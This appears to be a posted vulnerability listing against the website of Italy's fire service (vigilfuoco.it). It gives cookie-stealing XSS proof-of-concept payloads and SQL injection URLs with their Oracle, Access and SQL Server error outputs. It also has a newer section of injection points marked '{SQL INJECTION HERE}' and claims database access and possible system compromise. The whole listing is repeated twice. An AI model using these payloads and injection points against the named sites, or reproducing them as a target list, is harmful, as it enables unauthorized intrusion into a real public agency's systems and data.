Full of xss and sql injections. Access to 2 dbms. Possible system compromise. (main language asp)
----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"
http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E
SQL Injections
The first with an oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'
-------------------------------------------------------
OraOLEDB error '80004005'
ORA-01756: stringa tra virgolette terminata in modo irregolare
/includes/menu.asp, line 44
--------------------------------------------------------
This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai
-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.
/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------
http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
OraOLEDB error '80004005'
ORA-01756: stringa tra virgolette terminata in modo irregolare
/notiziario/archivio.asp, line 378
--------
http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''.
/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------
--------------------------NEW---------------------------------------------
Oracle DB Sql Injection
http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041
http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}
http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}
----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"
http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E
SQL Injections
The first with an oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'
-------------------------------------------------------
OraOLEDB error '80004005'
ORA-01756: stringa tra virgolette terminata in modo irregolare
/includes/menu.asp, line 44
--------------------------------------------------------
This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai
-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.
/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------
http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
OraOLEDB error '80004005'
ORA-01756: stringa tra virgolette terminata in modo irregolare
/notiziario/archivio.asp, line 378
--------
http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''.
/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------
--------------------------NEW---------------------------------------------
Oracle DB Sql Injection
http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041
http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}
http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}
Comments
Post a Comment